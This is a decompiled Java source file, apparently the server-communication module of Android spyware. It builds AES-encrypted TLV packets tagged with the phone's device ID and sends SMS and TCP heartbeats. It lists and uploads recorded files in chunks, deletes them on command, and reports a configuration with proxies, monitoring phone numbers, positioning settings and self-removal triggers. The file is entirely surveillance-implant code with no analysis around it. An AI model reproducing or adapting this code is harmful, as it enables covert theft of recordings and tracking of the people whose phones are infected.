// Decompiled by JEB v1.5.201408040 - http://www.android-decompiler.com

package com.android.packet;

import android.content.Context;
import android.telephony.TelephonyManager;
import com.android.services.GlobalAPP;
import com.my.api.AESCipher;
import com.my.api.MyFunctions;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.IOException;
import java.io.OutputStream;
import java.util.ArrayList;
import java.util.Iterator;

public abstract class Communication {
    private Context context;
    private TelephonyManager telephonyManager;

    public Communication(Context context) {
        super();
        this.context = context;
        this.telephonyManager = this.context.getSystemService("phone");
    }

    protected TLVPacket buildMobileEncryption(TLVPacket contentPacket) throws UnsupportedOperationException {
        if(GlobalAPP.RESEND_TCP_FLAG != 0) {
            TLVPacket v4 = this.buildTLVPacket("0xfe5b90", contentPacket);
            return v4;
        }

        ByteArrayOutputStream v2 = new ByteArrayOutputStream();
        try {
            AESCipher v0 = AESCipher.getInstance(GlobalAPP.TjUIDasHexString.getBytes());
            ByteArrayTempStream v3 = new ByteArrayTempStream(contentPacket.getLengthInInt());
            TCPCommunication.write(v3, contentPacket);
            v0.encrypt(new ByteArrayInputStream(v3.toByteArray()), ((OutputStream)v2));
        }
        catch(Exception v4_1) {
        }

        return this.buildTLVPacket("0xfe5b90", v2.toByteArray());
    }

    protected TLVPacket buildMobileTgComm(TLVPacket mobileTgData) {
        return this.buildTLVPacket("0x8602a0", new TLVPacket[]{this.getMobilTgUIDTLV(), mobileTgData});
    }

    protected TLVPacket buildMobileTgCommSig(TLVPacket mobileTgData) {
        TLVPacket v1 = mobileTgData == null ? this.buildTLVPacket("0x860160", new Long(Long.parseLong(this.telephonyManager.getDeviceId()))) : this.buildTLVPacket("0x860160", new TLVPacket[]{this.getMobilTgUIDTLV(), mobileTgData});
        return v1;
    }

    protected TLVPacket buildMobileTgExtendedHeartBeatV10() {
        return this.buildMobileTgComm(this.buildTgData(this.buildMobileEncryption(this.buildTLVPacket("0x840370", this.getExtendedHeartbeatBody()))));
    }

    protected TLVPacket buildMobileTgHeartBeatV10SMS() {
        return this.buildMobileTgComm(this.buildTgData(this.buildMobileEncryption(this.buildTLVPacket("0x840270", this.getHeartbeatBodySMS()))));
    }

    protected TLVPacket buildMobileTgHeartBeatV10SMSEx() {
        return this.buildMobileTgComm(this.buildTgData(this.buildMobileEncryption(this.buildTLVPacket("0x840270", this.getHeartbeatBodySMSEx()))));
    }

    protected TLVPacket buildMobileTgHeartBeatV10TCP() {
        return this.buildMobileTgComm(this.buildTgData(this.buildMobileEncryption(this.buildTLVPacket("0x840270", this.getHeartbeatBodyTCP()))));
    }

    protected TLVPacket buildMobileTgHeartBeatV10TCPEx() {
        return this.buildMobileTgComm(this.buildTgData(this.buildMobileEncryption(this.buildTLVPacket("0x840270", this.getHeartbeatBodyTCPEx()))));
    }

    protected TLVPacket buildMobileTgOfflineError(int requestiD) {
        return this.buildMobileTgComm(this.buildTgData(this.buildMobileEncryption(this.buildTLVPacket("0x841fa0", new TLVPacket[]{this.buildTLVPacket("0xfe1350", Integer.valueOf(requestiD)), this.buildTLVPacket("0xfe5760", new Long(Long.parseLong(this.getTelephonyManager().getDeviceId()))), this.buildTLVPacket("0xfe1050", Integer.valueOf(requestiD))}))));
    }

    protected TLVPacket buildMobileTgOfflineUploadModuleDoneReply(int requestiD) {
        return this.buildMobileTgComm(this.buildTgData(this.buildMobileEncryption(this.buildTLVPacket("0x841ea0", this.buildTLVPacket("0xfe1350", Integer.valueOf(requestiD))))));
    }

    protected TLVPacket buildMobileTgOfflineUploadModuleReply(int requestiD) {
        return this.buildMobileTgComm(this.buildTgData(this.buildMobileEncryption(this.buildTLVPacket("0x841ba0", this.buildTLVPacket("0xfe1350", Integer.valueOf(requestiD))))));
    }

    protected TLVPacket buildMobileTgRecordedFileDeleteReply(int requestiD, String FullPath) {
        ArrayList v5 = new ArrayList();
        v5.add(this.buildTLVPacket("0xfe1350", Integer.valueOf(requestiD)));
        v5.add(this.getMobilTgUIDTLV());
        v5.add(this.buildTLVPacket("0x27280", FullPath));
        return this.buildMobileTgComm(this.buildTgData(this.buildMobileEncryption(this.buildTLVPacket("0x8428a0", v5.toArray(new TLVPacket[v5.size()])))));
    }

    protected TLVPacket buildMobileTgRecordedFileDownloadChunk(int requestiD, String FullPath, String FullPathM, byte[] data) {
        ArrayList v8 = new ArrayList();
        v8.add(this.buildTLVPacket("0xfe1350", Integer.valueOf(requestiD)));
        v8.add(this.buildTLVPacket("0xfe5760", new Long(Long.parseLong(this.getTelephonyManager().getDeviceId()))));
        v8.add(this.buildTLVPacket("0x27280", FullPath));
        if(FullPath != null) {
            v8.add(this.buildTLVPacket("0x27e90", FullPathM));
        }

        v8.add(this.buildTLVPacket("0x27090", data));
        return this.buildMobileTgComm(this.buildTgData(this.buildMobileEncryption(this.buildTLVPacket("0x8425a0", v8.toArray(new TLVPacket[v8.size()])))));
    }

    protected TLVPacket buildMobileTgRecordedFileDownloadCompleted(int requestiD, String FullPath, String FullPathM) {
        ArrayList v6 = new ArrayList();
        v6.add(this.buildTLVPacket("0xfe1350", Integer.valueOf(requestiD)));
        v6.add(this.buildTLVPacket("0xfe5760", new Long(Long.parseLong(this.getTelephonyManager().getDeviceId()))));
        v6.add(this.buildTLVPacket("0x27280", FullPath));
        if(FullPath != null) {
            v6.add(this.buildTLVPacket("0x27e90", FullPathM));
        }

        return this.buildMobileTgComm(this.buildTgData(this.buildMobileEncryption(this.buildTLVPacket("0x8426a0", v6.toArray(new TLVPacket[v6.size()])))));
    }

    protected TLVPacket buildMobileTgRecordedFileDownloadReply(int requestiD, String FullPath, String FullPathM) {
        ArrayList v6 = new ArrayList();
        v6.add(this.buildTLVPacket("0xfe1350", Integer.valueOf(requestiD)));
        v6.add(this.buildTLVPacket("0xfe5760", new Long(Long.parseLong(this.getTelephonyManager().getDeviceId()))));
        v6.add(this.buildTLVPacket("0x27280", FullPath));
        if(FullPathM != null) {
            v6.add(this.buildTLVPacket("0x27e90", FullPathM));
        }

        return this.buildMobileTgComm(this.buildTgData(this.buildMobileEncryption(this.buildTLVPacket("0x8424a0", v6.toArray(new TLVPacket[v6.size()])))));
    }

    protected TLVPacket buildMobileTgRecordedFilesReply(int requestiD, int ModuleID, int ModuleSubID) throws IOException {
        ArrayList v14 = new ArrayList();
        v14.add(this.buildTLVPacket("0xfe1350", Integer.valueOf(requestiD)));
        v14.add(this.buildTLVPacket("0xfe5760", new Long(Long.parseLong(this.getTelephonyManager().getDeviceId()))));
        if(ModuleID != 0) {
            v14.add(this.buildTLVPacket("0xfe0d40", Integer.valueOf(ModuleID)));
        }

        if(ModuleSubID != 0) {
            v14.add(this.buildTLVPacket("0xfe0f40", Integer.valueOf(ModuleSubID)));
        }

        File[] v10 = MyFunctions.dirListByAscendingDate(this.getContext().getFilesDir());
        int v3 = 0;
        int v8 = 0;
        int v16 = v10.length;
        int v15;
        for(v15 = 0; v15 < v16; ++v15) {
            File v9 = v10[v15];
            if(v9.getAbsolutePath().endsWith("rd")) {
                v8 = 1;
                v14.add(this.buildTLVPacket("0x27280", v9.getAbsolutePath()));
                ++v3;
            }

            if(v3 == 20) {
                break;
            }
        }

        if(v8 == 0) {
            GlobalAPP.DATA_AVAILABLE_FLAG = 0;
        }

        GlobalAPP.fileCount = v3;
        return this.buildMobileTgComm(this.buildTgData(this.buildMobileEncryption(this.buildTLVPacket("0x8422a0", v14.toArray(new TLVPacket[v14.size()])))));
    }

    protected TLVPacket buildTLVPacket(String type, Object content) {
        TLVPacket v0 = new TLVPacket();
        v0.setBody(content);
        v0.setHeader(TypeDefinitons.TLVPAYLOADTYPES.get(type).intValue());
        return v0;
    }

    protected TLVPacket buildTgConfigFile() {
        ArrayList v36 = new ArrayList();
        v36.add(this.buildTLVPacket("0xfe1350", Integer.valueOf(GlobalAPP.RequestID)));
        v36.add(this.buildTLVPacket("0xfe3c40", Integer.valueOf(GlobalAPP.counter)));
        v36.add(this.getMobilTgUIDTLV());
        v36.add(this.buildTLVPacket("0xfe1540", Integer.valueOf(GlobalAPP.Version)));
        v36.add(this.buildTLVPacket("0xfe5870", GlobalAPP.MobileTgID));
        v36.add(this.buildTLVPacket("0x846140", Integer.valueOf(GlobalAPP.HeartBeatInterval)));
        Iterator v39 = GlobalAPP.proxies.iterator();
        while(v39.hasNext()) {
            v36.add(this.buildTLVPacket("0x803770", v39.next()));
        }

        v39 = GlobalAPP.ports.iterator();
        while(v39.hasNext()) {
            v36.add(this.buildTLVPacket("0x803840", v39.next()));
        }

        v39 = GlobalAPP.phones.iterator();
        while(v39.hasNext()) {
            v36.add(this.buildTLVPacket("0x846370", v39.next()));
        }

        v36.add(this.buildTLVPacket("0x846670", GlobalAPP.TjID));
        v36.add(this.buildTLVPacket("0x846540", Integer.valueOf(GlobalAPP.TjUID)));
        v36.add(this.buildTLVPacket("0xfe2140", Integer.valueOf(GlobalAPP.UserID)));
        v36.add(this.buildTLVPacket("0x800d40", Integer.valueOf(GlobalAPP.MaxIfct)));
        v36.add(this.buildTLVPacket("0x846840", Integer.valueOf(GlobalAPP.RemovalAtDate)));
        v36.add(this.buildTLVPacket("0x803b40", Integer.valueOf(GlobalAPP.RemovalIfNoProxy)));
        v36.add(this.buildTLVPacket("0x846290", new byte[]{((byte)GlobalAPP.HeartBeatRestrictions_byte2), ((byte)GlobalAPP.HeartBeatRestrictions_byte1)}));
        v36.add(this.buildTLVPacket("0x846090", new byte[]{((byte)GlobalAPP.EventBasedHeartBeat_byte2), ((byte)GlobalAPP.EventBasedHeartBeat_byte1)}));
        v36.add(this.buildTLVPacket("0x846490", new byte[]{((byte)GlobalAPP.Positioning_byte4), ((byte)GlobalAPP.Positioning_byte3), ((byte)GlobalAPP.Positioning_byte2), ((byte)GlobalAPP.Positioning_byte1)}));
        v36.add(this.buildTLVPacket("0x8467b0", Byte.valueOf(((byte)GlobalAPP.LocationChanged))));
        v39 = GlobalAPP.VoicePhones.iterator();
        while(v39.hasNext()) {
            v36.add(this.buildTLVPacket("0x846370", v39.next()));
        }

        return this.buildTLVPacket("0xfe5b90", this.buildTLVPacket("0x8433a0", v36.toArray(new TLVPacket[v36.size()])));
    }

    protected TLVPacket buildTgData(TLVPacket data) {
        return this.buildTLVPacket("0x840190", data);
    }

    protected byte[] disassembleMobileTgAnswer(byte[] bytes) throws IOException {
        byte[] v3;
        ByteArrayInputStream v4 = new ByteArrayInputStream(bytes);
        byte[] v1 = new byte[4];
        v4.read(v1, 0, 4);
        if(Util.byteArrayToInt(Util.shiftBytes(v1)) != TypeDefinitons.TLVPAYLOADTYPES.get("0x8602a0").intValue()) {
            goto label_120;
        }

        v4.read(v1, 0, 4);
        Util.byteArrayToInt(Util.shiftBytes(v1));
        v4.read(v1, 0, 4);
        if(Util.byteArrayToInt(Util.shiftBytes(v1)) != TypeDefinitons.TLVPAYLOADTYPES.get("0x820190").intValue()) {
            goto label_120;
        }

        v4.read(v1, 0, 4);
        byte[] v10 = v1;
        int v6 = Util.byteArrayToInt(Util.shiftBytes(v1));
        v4.read(v1, 0, 4);
        byte[] v11 = v1;
        if(Util.byteArrayToInt(Util.shiftBytes(v1)) == TypeDefinitons.TLVPAYLOADTYPES.get("0xfe5b90").intValue()) {
            v1 = new byte[v6 - 8];
            v4.read(v1);
            byte[] v9 = new byte[4];
            System.arraycopy(v1, 0, v9, 0, 4);
            if(Util.byteArrayToInt(Util.shiftBytes(v9)) != v6 - 8) {
                ByteArrayOutputStream v7 = new ByteArrayOutputStream();
                try {
                    AESCipher.getInstance(GlobalAPP.TjUIDasHexString.getBytes()).decrypt(new ByteArrayInputStream(v1), ((OutputStream)v7));
                }
                catch(Exception v13) {
                }

                v4 = new ByteArrayInputStream(v7.toByteArray());
            }
            else {
                v4 = new ByteArrayInputStream(v1);
            }

            v1 = new byte[4];
            v4.read(v1, 0, 4);
            v6 = Util.byteArrayToInt(Util.shiftBytes(v1));
            v4.read(v1, 0, 4);
            if(Util.byteArrayToInt(Util.shiftBytes(v1)) != TypeDefinitons.TLVPAYLOADTYPES.get("0xfe5a90").intValue()) {
                goto label_120;
            }

            v1 = new byte[v6 - 8];
            v4.read(v1);
            v3 = v1;
            return v3;
        }

        if(v10 != null) {
            if(v11 == null) {
                goto label_120;
            }

            v1 = new byte[v6 - 8];
            v4.read(v1);
            v3 = new byte[v1.length + 8];
            System.arraycopy(v10, 0, v3, 0, 4);
            System.arraycopy(v11, 0, v3, 4, 4);
            System.arraycopy(v1, 0, v3, 8, v1.length);
        }
        else {
        label_120:
            v3 = null;
        }

        return v3;
    }

    public Context getContext() {
        return this.context;
    }

    protected abstract String getExtendedHeartbeatBody();

    protected abstract String getHeartbeatBodySMS();

    protected abstract String getHeartbeatBodySMSEx();

    protected abstract String getHeartbeatBodyTCP();

    protected abstract String getHeartbeatBodyTCPEx();

    protected TLVPacket getMobilTgUIDTLV() {
        return this.buildTLVPacket("0xfe5760", new Long(Long.parseLong(this.getTelephonyManager().getDeviceId())));
    }

    public TelephonyManager getTelephonyManager() {
        return this.telephonyManager;
    }
}

